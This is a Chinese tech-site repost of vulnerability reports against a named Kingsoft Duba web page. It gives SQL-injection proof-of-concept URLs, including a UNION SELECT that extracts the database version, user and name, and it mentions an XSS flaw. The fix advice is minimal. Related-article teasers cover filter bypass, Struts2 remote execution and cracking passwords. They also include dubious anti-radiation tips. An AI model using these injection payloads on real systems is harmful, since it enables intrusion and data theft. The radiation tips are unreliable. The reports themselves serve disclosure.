金山毒霸有哪些漏洞？这些漏洞如何修复？

2018-03-09 08:51:46责编：llp 来源：驱动管家人气：

金山毒霸多个sql注入及XSS漏洞和修复，需要的朋友可以参考下。

金山毒霸有哪些漏洞？这些漏洞如何修复？

第一个

简要描述：由于变量过滤不严产生SQL注入漏洞可通过入侵手段拿到站点权限

详细说明：http://labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2

漏洞证明：http://labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=1

http://labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=2

结果明显不同注入漏洞产生

修复方案：过滤变量app

第二个

简要描述：过滤不严导致存在SQL注入

详细说明：过滤不严导致存在SQL注入有机会拿下服务器权限

漏洞证明：http://labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5%20and%201=2%20union%20select%201,2,version(),4,5,user(),database(),8,9--

http://labs.duba.net/robots.txt

未作进一步测试

修复方案：过滤参数

第三个：

简要描述：留言处过滤不严造成跨站漏洞

详细说明：留言处过滤不严造成跨站漏洞

漏洞证明：http://labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5

bash脚本包含哪些内容？如何安装使用bash脚本？
backtrack-scripts最初被设计用再BT5 R2,32位GNOME上使用，现在已经独立出来一个shell脚本。该脚本包含各种python脚本集合，如下：1：Domain Parser2：fern-wifi-cracker3：ghost-phisher4：HexorBase5：ssql-l
详情2018-01-25 17:41:31责编：llp 来源：驱动管家
asp教程如何破解加密的asp木马登陆密码？
破解目标：破解一经过加密的Asp木马登陆密码。由于木马里没有版本说明，具体也不知道这木马叫什么名。破解思路：两种，用加密后的密码替换密文和利用密文及加密算法反解出密码。前者根本算不上真正的破解。如果
详情2018-02-07 15:19:51责编：llp 来源：驱动管家
防电脑辐射的方法有哪些？这九招可以防电脑辐射
第一招：在电脑旁放上几盆仙人掌，它可以有效地吸收辐射;第二招：还对于生活紧张而忙碌的人群来说，抵御电脑辐射最简单的办法就是在每天上午喝2至3杯的绿茶，吃一个橘子。茶叶中含有丰富的维生素Ａ原，它被人体
详情2018-02-02 10:55:13责编：llp 来源：驱动管家
取得mysql的root密码不需要再找web路径
刚才在卫生间蹲着的时候忽然想到这个问题，mysql5 x for linux下面有一个函数，可以帮助我们干很多事情，这个函数4。x下面貌似没，原来一直没发现，也没去查函数手册，就我自己的经验来写点东西。4,x的明天再看
详情2018-02-14 09:43:45责编：llp 来源：驱动管家
cc攻击是什么？怎么防cc攻击网站？
CC攻击（Challenge Collapsar）是DDOS（分布式拒绝服务）的一种，也是一种常见的网站攻击方法，攻击者通过代理服务器或者肉鸡向向受害主机不停地发大量数据包，造成对方服务器资源耗尽，一直到宕机崩溃。CC攻击
详情2018-01-13 14:51:33责编：llp 来源：驱动管家
装有sql数据库的电脑主机是怎么被入侵的？黑客入侵sql数据库的步骤
近些年来，计算机的安全性能，曾突飞猛进的上升势头。导致以前网络，遍地都是的弱口令肉鸡，现在早已消失的不知去向。可见其安全的提升程度，难道菜鸟抓取肉鸡成为了“天方夜潭”?当然答案是否定的，具体如何获取
详情2018-01-17 15:54:54责编：llp 来源：驱动管家
windows柯达图像查看器存在内存破坏漏洞临时解决方法是什么？
受影响系统： Microsoft Windows XP SP2 Microsoft Windows Server 2003 SP2 Microsoft Windows Server 2003 SP1 Microsoft Windows 2000SP4 描述： -----------------------------------------------------------------------------
详情2018-02-23 17:28:37责编：llp 来源：驱动管家
struts2漏洞爆出怎么解决struts2漏洞？
在2013年6月底发布的Struts 2 3 15版本被曝出存在重要的安全漏洞，主要问题如下：可远程执行服务器脚本代码用户可以构造http: host struts2-blank example X action?action:%25{(new+java lang ProcessBuilde
详情2018-01-17 16:25:11责编：llp 来源：驱动管家
绕过SQL注入限制的方法怎么绕过select这个关键字？
突然想我们是否可以用什么方法绕过SQL注入的限制呢？到网上考察了一下，提到的方法大多都是针对AND与“’”号和“=”号过滤的突破，虽然有点进步的地方，但还是有一些关键字没有绕过，由于我不常入侵网站所
详情2018-03-01 18:06:41责编：llp 来源：驱动管家
海康威视远程监控存在的xxe漏洞分析研究报告
海康威视是一个致力于不断提升视频处理技术和视频分析技术，面向全球提供领先的监控产品、技术解决方案与专业优质服务，物联网发展和安全威胁总是如影随形。两个月前，我想研究一下网络摄像机，然后就在亚马逊上
详情2018-01-15 15:26:02责编：llp 来源：驱动管家